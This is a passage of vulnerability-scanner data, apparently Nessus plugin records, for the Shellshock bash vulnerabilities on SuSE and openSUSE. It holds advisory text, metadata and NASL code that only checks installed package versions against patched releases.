This hardening feature is work in progress and might be improved in later updates.\n\nAdditionally, two other security issues have been fixed :\n\n - Nested HERE documents could lead to a crash of bash.\n (CVE-2014-7186)\n\n - Nesting of for loops could lead to a crash of bash.\n (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : bash (SAT Patch Number 9780)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:bash", "p-cpe:/a:novell:suse_linux:11:bash-doc", "p-cpe:/a:novell:suse_linux:11:libreadline5", "p-cpe:/a:novell:suse_linux:11:libreadline5-32bit", "p-cpe:/a:novell:suse_linux:11:readline-doc", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_BASH-140926.NASL", "href": "https://www.tenable.com/plugins/nessus/77958", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77958);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"SuSE 11.3 Security Update : bash (SAT Patch Number 9780)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances. (CVE-2014-7169)\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and is less serious due to\nthe special, non-default system configuration that is needed to create\nan exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with\nBASH_FUNC_. 
This hardening feature is work in progress and might be\nimproved in later updates.\n\nAdditionally, two other security issues have been fixed :\n\n - Nested HERE documents could lead to a crash of bash.\n (CVE-2014-7186)\n\n - Nesting of for loops could lead to a crash of bash.\n (CVE-2014-7187)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-6271.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7169.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7186.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7187.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 9780.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:readline-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", 
reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:14", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and it is less serious due to the 
special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_ . This hardening feature is work in progress and might be improved in later updates.\n\nAdditionally, two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1229-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2014-563.NASL", "href": "https://www.tenable.com/plugins/nessus/77966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-563.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif 
(description)\n{\n script_id(77966);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1229-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and it is less serious due\nto the special, non-default system configuration that is needed to\ncreate an exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with BASH_FUNC_\n. 
This hardening feature is work in progress and might be improved in\nlater updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00039.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debuginfo-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debugsource-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-devel-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-lang-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-debuginfo-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-debuginfo-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"readline-devel-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", 
reference:\"libreadline6-32bit-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-61.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:55:57", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and it is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_ . 
This hardening feature is work in progress and might be improved in later updates.\n\nAdditionally, two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1242-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-564.NASL", "href": "https://www.tenable.com/plugins/nessus/77967", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77967);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n 
\"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1242-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and it is less serious due\nto the special, non-default system configuration that is needed to\ncreate an exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with BASH_FUNC_\n. This hardening feature is work in progress and might be improved in\nlater updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00052.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debuginfo-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-debugsource-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-devel-4.2-68.8.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"bash-lang-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bash-loadables-debuginfo-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libreadline6-debuginfo-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"readline-devel-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-68.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-68.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:23:10", "description": "The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple vulnerabilities:\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which 
